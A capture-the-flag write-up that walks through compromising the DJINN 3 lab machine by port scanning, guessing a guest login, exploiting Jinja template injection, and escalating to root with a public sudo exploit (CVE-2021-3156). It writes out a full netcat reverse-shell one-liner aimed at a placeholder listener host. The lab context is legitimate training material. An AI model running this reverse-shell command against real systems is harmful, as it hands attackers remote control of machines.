Post

DJINN 3

Posted Updated
DJINN 3 Machine 🖥️
DJINN 3 Machine 🖥️
By Shivendra Prajapati
1 min read

Description ⤵️

💡 DJINN-3

  • Level: Intermediate
  • flags: root.txt
  • Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You’ll see the IP right on the login screen. You have to read the root flag.

Let’s find the IP Address first »

167-1.png

1

IP : 10.0.2.20

Port Scan Results ➡️

167-2.png

1
2
3
4
5

OPEN PORTS >
22     SSH
80     HTTP
5000   HTTP
31337  Elite?

Web Enumeration ⤵️

167-3.png

167-4.png

So the port 31337 is for netcat connection → I guess the username & password as guest:guest and I got in →

167-5.png

Now lets check for SSTI vulnerability

167-6.png

167-7.png

So I guess we have SSTI vulnerability so lets exploit →

Since my payload land into jinja catagory of SSTI so →

167-8.png

1
2

{: .nolineno}

167-9.png

So After using this payload I got response as →

167-10.png

So now lets have a reverse shell and I will be using this nc reverse shell payload rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f to do so →

167-11.png

167-12.png

SHELL ➡️

167-13.png

Now I have used one exploit to counter this linux machine →

And this time I exploited the sudo version →

167-14.png

URL → https://github.com/worawit/CVE-2021-3156

167-15.png

Now lets use the exploit_nss.py exploit →

167-16.png

167-17.png

If you have any questions or suggestions, please leave a comment below. Thank You !

Proving Grounds, Play
Public Exploit SSTI PrivEsc sudo exploit jinja
This post is licensed under CC BY 4.0 by the author.